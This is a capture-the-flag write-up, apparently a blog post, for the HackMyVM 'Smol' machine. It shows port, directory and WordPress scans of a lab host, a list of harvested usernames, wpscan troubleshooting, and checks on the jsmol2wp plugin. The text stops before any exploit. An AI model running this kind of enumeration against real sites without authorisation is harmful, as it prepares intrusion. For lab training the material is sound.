{"id":835,"date":"2025-06-07T15:52:51","date_gmt":"2025-06-07T07:52:51","guid":{"rendered":"http:\/\/162.14.82.114\/?p=835"},"modified":"2025-06-07T15:52:51","modified_gmt":"2025-06-07T07:52:51","slug":"hmv-_-smol","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/835\/06\/07\/2025\/","title":{"rendered":"hmv[-_-]Smol"},"content":{"rendered":"<h1>Smol<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550967.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550967.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250607094448803\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550969.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550969.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250607095831139\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ rustscan -a $IP -- -sCV            \n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\n\nOpen 192.168.10.100:22\nOpen 192.168.10.100:80\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMc4hLykriw3nBOsKHJK1Y6eauB8OllfLLlztbB4tu4c9cO8qyOXSfZaCcb92uq\/Y3u02PPHWq2yXOLPler1AFGVhuSfIpokEnT2jgQzKL63uJMZtoFzL3RW8DAzunrHhi\/nQqo8sw7wDCiIN9s4PDrAXmP6YXQ5ekK30om9kd5jHG6xJ+\/gIThU4ODr\/pHAqr28bSpuHQdgphSjmeShDMg8wu8Kk\/B0bL2oEvVxaNNWYWc1qHzdgjV5HPtq6z3MEsLYzSiwxcjDJ+EnL564tJqej6R69mjII1uHStkrmewzpiYTBRdgi9A3Yb+x8NxervECFhUR2MoR1zD+0UJbRA2v1LQaGg9oYnYXNq3Lc5c4aXz638wAUtLtw2SwTvPxDrlCmDVtUhQFDhyFOu9bSmPY0oGH5To8niazWcTsCZlx2tpQLhF\/gS3jP\/fVw+H6Eyz\/yge3RYeyTv3ehV6vXHAGuQLvkqhT6QS21PLzvM7bCqmo1YIqHfT2DLi7jZxdk=\n|   256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJNL\/iO8JI5DrcvPDFlmqtX\/lzemir7W+WegC7hpoYpkPES6q+0\/p4B2CgDD0Xr1AgUmLkUhe2+mIJ9odtlWW30=\n|   256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFG\/Wi4PUTjReEdk2K4aFMi8WzesipJ0bp0iI0FM8AfE\n80\/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\n|_http-title: Did not follow redirect to http:\/\/www.smol.hmv\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\nService Info: OS: 
Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<p>The scan reveals a domain name that needs resolving, so add a hosts entry for it:<\/p>\n<pre><code class=\"language-bash\">192.168.10.100    www.smol.hmv<\/code><\/pre>\n<h3>Directory Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ feroxbuster  -u http:\/\/smol.hmv -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php txt html -s 200 301 302 -d 1\n\n ___  ___  __   __     __      __         __   ___\n|__  |__  |__) |__) | \/  `    \/  \\ \\_\/ | |  \\ |__\n|    |___ |  \\ |  \\ | \\__,    \\__\/ \/ \\ | |__\/ |___\nby Ben &quot;epi&quot; Risher \ud83e\udd13                 ver: 2.11.0\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfaf  Target Url            \u2502 http:\/\/smol.hmv\n \ud83d\ude80  Threads               \u2502 50\n \ud83d\udcd6  Wordlist              \u2502 \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n \ud83d\udc4c  Status Codes          \u2502 [200, 301, 302]\n \ud83d\udca5  Timeout (secs)        \u2502 7\n \ud83e\udda1  User-Agent            \u2502 feroxbuster\/2.11.0\n \ud83d\udc89  Config File           \u2502 \/etc\/feroxbuster\/ferox-config.toml\n \ud83d\udd0e  Extract Links         \u2502 true\n \ud83d\udcb2  Extensions            \u2502 [php, txt, html]\n \ud83c\udfc1  HTTP methods          \u2502 [GET]\n \ud83d\udd03  Recursion Depth       \u2502 
1\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfc1  Press [ENTER] to use the Scan Management Menu\u2122\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n301      GET        0l        0w        0c http:\/\/smol.hmv\/ =&gt; http:\/\/www.smol.hmv\/\n301      GET        0l        0w        0c http:\/\/smol.hmv\/index.php =&gt; http:\/\/www.smol.hmv\/\n301      GET        9l       28w      309c http:\/\/smol.hmv\/wp-content =&gt; http:\/\/smol.hmv\/wp-content\/\n200      GET       81l      274w     4537c http:\/\/smol.hmv\/wp-login.php\n200      GET      384l     3177w    19903c http:\/\/smol.hmv\/license.txt\n301      GET        9l       28w      310c http:\/\/smol.hmv\/wp-includes =&gt; http:\/\/smol.hmv\/wp-includes\/\n200      GET      394l      768w     6125c http:\/\/smol.hmv\/wp-admin\/css\/install.css\n200      GET       13l       78w     4373c http:\/\/smol.hmv\/wp-admin\/images\/wordpress-logo.png\n200      GET       23l       81w     1259c http:\/\/smol.hmv\/wp-admin\/upgrade.php\n302      GET        0l        0w        0c http:\/\/smol.hmv\/wp-admin\/ =&gt; http:\/\/www.smol.hmv\/wp-login.php?redirect_to=http%3A%2F%2Fsmol.hmv%2Fwp-admin%2F&amp;reauth=1\n302      GET        0l        0w        0c http:\/\/smol.hmv\/wp-admin\/import.php =&gt; http:\/\/www.smol.hmv\/wp-login.php?redirect_to=http%3A%2F%2Fsmol.hmv%2Fwp-admin%2Fimport.php&amp;reauth=1\n302      GET        0l        0w        0c http:\/\/smol.hmv\/wp-admin\/update-core.php =&gt; 
http:\/\/www.smol.hmv\/wp-login.php?redirect_to=http%3A%2F%2Fsmol.hmv%2Fwp-admin%2Fupdate-core.php&amp;reauth=1\n200      GET       17l       82w     1261c http:\/\/smol.hmv\/wp-admin\/install.php\n200      GET       98l      836w     7425c http:\/\/smol.hmv\/readme.html\n200      GET        5l       15w      135c http:\/\/smol.hmv\/wp-trackback.php\n301      GET        9l       28w      307c http:\/\/smol.hmv\/wp-admin =&gt; http:\/\/smol.hmv\/wp-admin\/\n302      GET        0l        0w        0c http:\/\/smol.hmv\/wp-signup.php =&gt; http:\/\/www.smol.hmv\/wp-login.php?action=register\n[#######&gt;------------] - 3m    319651\/882248  5m      found:17      errors:0      \n[####################] - 8m    882248\/882248  0s      found:17      errors:0      \n[####################] - 8m    882184\/882184  1953\/s  http:\/\/smol.hmv\/<\/code><\/pre>\n<h3>Blog Scan<\/h3>\n<p>This looks like a WordPress site, so try scanning it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ cmseek -u http:\/\/www.smol.hmv -v\n\n[i] Updating CMSeeK result index...\n[*] Report index updated successfully!\n\n ___ _  _ ____ ____ ____ _  _\n|    |\\\/| [__  |___ |___ |_\/  by @r3dhax0r\n|___ |  | ___| |___ |___ | \\_ Version 1.1.3 K-RONA\n\n [+]  CMS Detection And Deep Scan  [+] \n\n[i] Scanning Site: http:\/\/www.smol.hmv\n[+] User Agent: Mozilla\/5.0 (Windows NT 6.1; rv:12.0) Gecko\/20120403211507 Firefox\/12.0\n[+] Collecting Headers and Page Source for Analysis\n[+] Detection Started\n[+] Using headers to detect CMS (Stage 1 of 4)\n[*] CMS Detected, CMS ID: wp, Detection method: header\n[+] Getting CMS info from database\n[+] Starting WordPress DeepScan\n[+] Detecting Version and vulnerabilities\n[+] Generator Tag Available... 
Trying version detection using generator meta tag\n[*] Version Detected, WordPress Version 6.8.1\n[+] Initiating open directory and files check\n[+] XML-RPC interface not available\n[+] Looking for potential path disclosure\n[i] Checking user registration status\n[i] Starting passive plugin enumeration\n[*] 1 Plugin enumerated!\n[i] Starting passive theme enumeration\n[+] Looking for theme zip file!\n[*] 1 theme detected!\n[i] Starting Username Harvest\n[i] Harvesting usernames from wp-json api\n[!] Json api method failed trying with next\n[i] Harvesting usernames from jetpack public api\n[!] No results from jetpack api... maybe the site doesn&#039;t use jetpack\n[i] Harvesting usernames from wordpress author Parameter\n[*] Found user from source code: xavi\n[*] Found user from source code: diego\n[*] Found user from source code: gege\n[*] Found user from redirection: admin\n[*] Found user from redirection: think\n[*] Found user from redirection: wp\n[*] 6 Usernames were enumerated\n[i] Checking version vulnerabilities using wpvulns.com\n[x] Error Retriving data from wpvulndb\n___ _  _ ____ ____ ____ _  _\n|    |\\\/| [__  |___ |___ |_\/  by @r3dhax0r\n|___ |  | ___| |___ |___ | \\_ Version 1.1.3 K-RONA\n\n [+]  Deep Scan Results  [+] \n\n \u250f\u2501Target: www.smol.hmv\n \u2503\n \u2520\u2500\u2500 CMS: WordPress\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 Version: 6.8.1\n \u2503    \u2570\u2500\u2500 URL: https:\/\/wordpress.org\n \u2503\n \u2520\u2500\u2500[WordPress Deepscan]\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 Readme file found: http:\/\/www.smol.hmv\/readme.html\n \u2503    \u251c\u2500\u2500 License file: http:\/\/www.smol.hmv\/license.txt\n \u2503    \u251c\u2500\u2500 Uploads directory has listing enabled: http:\/\/www.smol.hmv\/wp-content\/uploads\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 Plugins Enumerated: 1\n \u2503    \u2502    \u2502\n \u2503    \u2502    \u2570\u2500\u2500 Plugin: jsmol2wp\n \u2503    \u2502        
\u2502\n \u2503    \u2502        \u251c\u2500\u2500 Version: 14.1.7\n \u2503    \u2502        \u2570\u2500\u2500 URL: http:\/\/www.smol.hmv\/wp-content\/plugins\/jsmol2wp\n \u2503    \u2502\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 Themes Enumerated: 1\n \u2503    \u2502    \u2502\n \u2503    \u2502    \u2570\u2500\u2500 Theme: popularfx\n \u2503    \u2502        \u2502\n \u2503    \u2502        \u251c\u2500\u2500 Version: 1.2.5\n \u2503    \u2502        \u2570\u2500\u2500 URL: http:\/\/www.smol.hmv\/wp-content\/themes\/popularfx\n \u2503    \u2502\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 Usernames harvested: 6\n \u2503    \u2502    \u2502\n \u2503    \u2502    \u251c\u2500\u2500 wp\n \u2503    \u2502    \u251c\u2500\u2500 think\n \u2503    \u2502    \u251c\u2500\u2500 diego\n \u2503    \u2502    \u251c\u2500\u2500 gege\n \u2503    \u2502    \u251c\u2500\u2500 xavi\n \u2503    \u2502    \u2570\u2500\u2500 admin\n \u2503    \u2502\n \u2503\n \u2520\u2500\u2500 Result: \/home\/kali\/temp\/Smol\/Result\/www.smol.hmv\/cms.json\n \u2503\n \u2517\u2501Scan Completed in 0.88 Seconds, using 45 Requests\n\n CMSeeK says ~ addio<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Information Gathering<\/h3>\n<p>The scan found several users and one plugin, <code>jsmol2wp<\/code>. A quick look turned up no related vulnerabilities, so scan with wpscan:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ wpscan --url http:\/\/www.smol.hmv --api-token xxxxxxxxxxxxxxxxxxx\n_______________________________________________________________\n         __          _______   _____\n         \\ \\        \/ \/  __ \\ \/ ____|\n          \\ \\  \/\\  \/ \/| |__) | (___   ___  __ _ _ __ \u00ae\n           \\ \\\/  \\\/ \/ |  ___\/ \\___ \\ \/ __|\/ _` | &#039;_ \\\n            \\  \/\\  \/  | |     ____) | 
(__| (_| | | | |\n             \\\/  \\\/   |_|    |_____\/ \\___|\\__,_|_| |_|\n\n         WordPress Security Scanner by the WPScan Team\n                         Version 3.8.25\n       Sponsored by Automattic - https:\/\/automattic.com\/\n       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n[+] URL: http:\/\/www.smol.hmv\/ [192.168.10.100]\n[+] Started: Fri Jun  6 22:30:50 2025\n\nInteresting Finding(s):\n\n[+] Headers\n | Interesting Entry: Server: Apache\/2.4.41 (Ubuntu)\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] XML-RPC seems to be enabled: http:\/\/www.smol.hmv\/xmlrpc.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n | References:\n |  - http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access\/\n\n[+] WordPress readme found: http:\/\/www.smol.hmv\/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] Upload directory has listing enabled: http:\/\/www.smol.hmv\/wp-content\/uploads\/\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] The external WP-Cron seems to be enabled: http:\/\/www.smol.hmv\/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n |  - https:\/\/www.iplocation.net\/defend-wordpress-from-ddos\n |  - https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1299\n\nFingerprinting the version - Time: 00:00:03 &lt;============================================================================================================&gt; (702 \/ 702) 100.00% 
Time: 00:00:03[i] The WordPress version could not be detected.\n\n[+] WordPress theme in use: popularfx\n | Location: http:\/\/www.smol.hmv\/wp-content\/themes\/popularfx\/\n | Last Updated: 2024-11-19T00:00:00.000Z\n | Readme: http:\/\/www.smol.hmv\/wp-content\/themes\/popularfx\/readme.txt\n | [!] The version is out of date, the latest version is 1.2.6\n | Style URL: http:\/\/www.smol.hmv\/wp-content\/themes\/popularfx\/style.css?ver=1.2.5\n | Style Name: PopularFX\n | Style URI: https:\/\/popularfx.com\n | Description: Lightweight theme to make beautiful websites with Pagelayer. Includes 100s of pre-made templates to ...\n | Author: Pagelayer\n | Author URI: https:\/\/pagelayer.com\n |\n | Found By: Css Style In Homepage (Passive Detection)\n |\n | Version: 1.2.5 (80% confidence)\n | Found By: Style (Passive Detection)\n |  - http:\/\/www.smol.hmv\/wp-content\/themes\/popularfx\/style.css?ver=1.2.5, Match: &#039;Version: 1.2.5&#039;\n\n[+] Enumerating All Plugins (via Passive Methods)\n[+] Checking Plugin Versions (via Passive and Aggressive Methods)\n[+] WPScan DB API OK\n | Plan: free\n | Requests Done (during the scan): 0\n | Requests Remaining: 23\n\n[+] Finished: Fri Jun  6 22:30:58 2025\n[+] Requests Done: 706\n[+] Cached Requests: 609\n[+] Data Sent: 191.137 KB\n[+] Data Received: 179.346 KB\n[+] Memory used: 248.938 MB\n[+] Elapsed time: 00:00:07\n\nScan Aborted: wrong constant name \n\n            version_finder_module.const_set(constant_name, Module.new)\n                                 ^^^^^^^^^^\nTrace: \/usr\/share\/rubygems-integration\/all\/gems\/wpscan-3.8.25\/lib\/wpscan\/db\/dynamic_finders\/plugin.rb:70:in `const_set&#039;\n\/usr\/share\/rubygems-integration\/all\/gems\/wpscan-3.8.25\/lib\/wpscan\/db\/dynamic_finders\/plugin.rb:70:in `maybe_create_module&#039;\n\/usr\/share\/rubygems-integration\/all\/gems\/wpscan-3.8.25\/lib\/wpscan\/db\/dynamic_finders\/plugin.rb:83:in 
`create_versions_finders&#039;\n\/usr\/share\/rubygems-integration\/all\/gems\/wpscan-3.8.25\/app\/finders\/plugin_version.rb:23:in `create_and_load_dynamic_versions_finders&#039;\n\/usr\/share\/rubygems-integration\/all\/gems\/wpscan-3.8.25\/app\/finders\/plugin_version.rb:16:in `initialize&#039;\n\/usr\/share\/rubygems-integration\/all\/gems\/cms_scanner-0.13.9\/lib\/cms_scanner\/finders\/independent_finder.rb:12:in `new&#039;\n\/usr\/share\/rubygems-integration\/all\/gems\/cms_scanner-0.13.9\/lib\/cms_scanner\/finders\/independent_finder.rb:12:in `find&#039;\n\/usr\/share\/rubygems-integration\/all\/gems\/wpscan-3.8.25\/app\/models\/plugin.rb:34:in `version&#039;\n\/usr\/share\/rubygems-integration\/all\/gems\/wpscan-3.8.25\/app\/controllers\/enumeration\/enum_methods.rb:79:in `each&#039;\n\/usr\/share\/rubygems-integration\/all\/gems\/wpscan-3.8.25\/app\/controllers\/enumeration\/enum_methods.rb:79:in `enum_plugins&#039;\n\/usr\/share\/rubygems-integration\/all\/gems\/wpscan-3.8.25\/app\/controllers\/enumeration.rb:13:in `run&#039;\n\/usr\/share\/rubygems-integration\/all\/gems\/cms_scanner-0.13.9\/lib\/cms_scanner\/controllers.rb:50:in `each&#039;\n\/usr\/share\/rubygems-integration\/all\/gems\/cms_scanner-0.13.9\/lib\/cms_scanner\/controllers.rb:50:in `block in run&#039;\n\/usr\/lib\/ruby\/3.1.0\/timeout.rb:84:in `timeout&#039;\n\/usr\/share\/rubygems-integration\/all\/gems\/cms_scanner-0.13.9\/lib\/cms_scanner\/controllers.rb:45:in `run&#039;\n\/usr\/share\/rubygems-integration\/all\/gems\/cms_scanner-0.13.9\/lib\/cms_scanner\/scan.rb:24:in `run&#039;\n\/usr\/share\/rubygems-integration\/all\/gems\/wpscan-3.8.25\/bin\/wpscan:17:in `block in &lt;top (required)&gt;&#039;\n\/usr\/share\/rubygems-integration\/all\/gems\/cms_scanner-0.13.9\/lib\/cms_scanner\/scan.rb:15:in `initialize&#039;\n\/usr\/share\/rubygems-integration\/all\/gems\/wpscan-3.8.25\/bin\/wpscan:6:in `new&#039;\n\/usr\/share\/rubygems-integration\/all\/gems\/wpscan-3.8.25\/bin\/wpscan:6:in 
`&lt;top (required)&gt;&#039;\n\/usr\/bin\/wpscan:25:in `load&#039;\n\/usr\/bin\/wpscan:25:in `&lt;main&gt;&#039;<\/code><\/pre>\n<h3>Handling the Error<\/h3>\n<p>A strange error appeared, and I did not know how to fix it, so I tried upgrading:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ sudo apt-get update &amp;&amp; sudo apt-get upgrade\n# sudo apt autoremove<\/code><\/pre>\n<p>But after the upgrade a new error appeared:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ wpscan             \n\/usr\/lib\/ruby\/vendor_ruby\/rubygems\/specification.rb:1421:in `block in activate_dependencies&#039;: Could not find &#039;opt_parse_validator&#039; (~&gt; 1.9.5) among 159 total gem(s) (Gem::MissingSpecError)\nChecked in &#039;GEM_PATH=\/home\/kali\/.local\/share\/gem\/ruby\/3.1.0:\/var\/lib\/gems\/3.1.0:\/usr\/local\/lib\/ruby\/gems\/3.1.0:\/usr\/lib\/ruby\/gems\/3.1.0:\/usr\/lib\/x86_64-linux-gnu\/ruby\/gems\/3.1.0:\/usr\/share\/rubygems-integration\/3.1.0:\/usr\/share\/rubygems-integration\/all:\/usr\/lib\/x86_64-linux-gnu\/rubygems-integration\/3.1.0&#039; at: \/usr\/share\/rubygems-integration\/all\/specifications\/cms_scanner-0.13.9.gemspec, execute `gem env` for more information\n        from \/usr\/lib\/ruby\/vendor_ruby\/rubygems\/specification.rb:1407:in `each&#039;\n        from \/usr\/lib\/ruby\/vendor_ruby\/rubygems\/specification.rb:1407:in `activate_dependencies&#039;\n        from \/usr\/lib\/ruby\/vendor_ruby\/rubygems\/specification.rb:1389:in `activate&#039;\n        from \/usr\/lib\/ruby\/vendor_ruby\/rubygems\/specification.rb:1423:in `block in activate_dependencies&#039;\n        from \/usr\/lib\/ruby\/vendor_ruby\/rubygems\/specification.rb:1407:in `each&#039;\n     
   from \/usr\/lib\/ruby\/vendor_ruby\/rubygems\/specification.rb:1407:in `activate_dependencies&#039;\n        from \/usr\/lib\/ruby\/vendor_ruby\/rubygems\/specification.rb:1389:in `activate&#039;\n        from \/usr\/lib\/ruby\/vendor_ruby\/rubygems.rb:290:in `block in activate_bin_path&#039;\n        from \/usr\/lib\/ruby\/vendor_ruby\/rubygems.rb:289:in `synchronize&#039;\n        from \/usr\/lib\/ruby\/vendor_ruby\/rubygems.rb:289:in `activate_bin_path&#039;\n        from \/usr\/bin\/wpscan:25:in `&lt;main&gt;&#039;<\/code><\/pre>\n<p>While trying to fix it, I found a solution from an expert on GitHub:<\/p>\n<blockquote>\n<p><a href=\"https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1243#issuecomment-489421054\">https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1243#issuecomment-489421054<\/a><\/p>\n<p>Resolved the same issue. In my fix, I did NOT uninstall anything.<\/p>\n<p>apt-get install ruby-dev<br \/>\ngem install ffi --platform=ruby<br \/>\ngem install yajl-ruby<br \/>\napt-get install libxslt-dev libxml2-dev<br \/>\ngem install nokogiri -- --use-system-libraries<\/p>\n<p>Then wpscan worked.<\/p>\n<\/blockquote>\n<p>But that did not fully fix it. 
No worries, I will switch to another Kali later.<\/p>\n<h3>Plugin Vulnerability Exploitation<\/h3>\n<p>Try googling for vulnerabilities in the plugin, but first check its version:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ curl -s http:\/\/www.smol.hmv\/wp-content\/plugins\/jsmol2wp\/ | html2text\n****** Index of \/wp-content\/plugins\/jsmol2wp ******\n[[ICO]]       Name                  Last_modified    Size Description\n===========================================================================\n[[PARENTDIR]] Parent_Directory                         -  \n[[   ]]       JSmol.min.js          2023-08-16 20:24 224K  
\n[[   ]]       JSmol.min.nojq.js     2023-08-16 20:24 129K  \n[[   ]]       add-textdomain.php    2023-08-16 20:24 4.6K  \n[[   ]]       class.jsMol2wp.php    2023-08-16 20:24 9.8K  \n[[DIR]]       css\/                  2023-08-16 20:22    -  \n[[TXT]]       help.htm              2023-08-16 20:24 9.0K  \n[[DIR]]       idioma\/               2023-08-16 20:22    -  \n[[DIR]]       images\/               2023-08-16 20:22    -  \n[[DIR]]       j2s\/                  2023-08-16 20:22    -  \n[[   ]]       jsmol2wp.php          2023-08-16 20:24 2.4K  \n[[TXT]]       jsmol_template.htm    2023-08-16 20:24 2.0K  \n[[DIR]]       php\/                  2023-08-16 20:22    -  \n[[TXT]]       readme.txt            2023-08-16 20:24 5.2K  \n[[TXT]]       simple.htm            2023-08-16 20:24 6.3K  \n[[TXT]]       updating_jsmol2wp.txt 2023-08-16 20:24  475  \n===========================================================================\n     Apache\/2.4.41 (Ubuntu) Server at www.smol.hmv Port 80\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ curl -s http:\/\/www.smol.hmv\/wp-content\/plugins\/jsmol2wp\/readme.txt | html2text\n=== JSmol2WP === Contributors: Jim Hu Tags: shortcodes, JSmol, Jmol, molecular\ngraphics, PDB Requires at least: 3.0 Tested up to: 4.9.4 Donate link:http:\/\/\nbiochemistry.tamu.edu\/index.php\/alum\/giving\/ Stable tag: 1.07 License: GPLv2 or\nlater License URI: http:\/\/www.gnu.org\/licenses\/gpl-2.0.html Text domain:\njsmol2wp Domain path:\/languages\/ Plugin to place JSmol molecular graphics\napplets in WordPress posts or pages. == Description == This shortcode plugin\nplaces JSmol applets in WordPress posts and pages. Use [jsmol pdb=&#039;accession&#039;]\nfor a minimal version. jsmol2wp will look to see if a pdb file has been\nuploaded to your wordpress and it will use that file if it can find it. If it\ncan&#039;t find a matching post for an uploaded attachement, it will try http:\/\/\nrcsb.org\/pdb. 
If it can&#039;t find a match there either, you&#039;ll get an error\nmessage in the JSmol window. Additional information on optional parameters are\nat the About\/Help link in the applets. This plugin was developed for use on the\nwebsite for the Department of Biochemistry and Biophysics at Texas A&amp;M\nUniversity (http:\/\/biochemistry.tamu.edu). == Installation == Place in the\nplugins directory and activate. No additional files or configurations are\nneeded. Thanks to Bob Hanson and the JMol team for making the javascript code\nfor jsmol available. See: http:\/\/chemapps.stolaf.edu\/jmol\/jsmol http:\/\/\nwiki.jmol.org\/index.php\/Jmol_JavaScript_Object This plugin also benefited from\nusing Jaime Prilusky&#039;s mediawiki extension for inspiration http:\/\/\nproteopedia.org\/support\/JSmolExtension\/ == Upgrade Notice == Version 1.03\nupdates the Jmol libraries and fixes a bug with the load parameter ==\nFrequently Asked Questions == = Is there an example of an installation? = See\nhttp:\/\/jimhu.org\/jsmol2wp-plugin-released-at-wordpress-org\/ = Where can I learn\nmore about what JSmol can do? = Jmol documentation can be found at http:\/\/\njmol.sourceforge.net\/#Learn%20to%20use%20Jmol and http:\/\/jmol.sourceforge.net\/\ndocs\/JmolUserGuide\/ == Screenshots == 1. Applet for a protein. 2. Applet for a\nsmall molecule. 
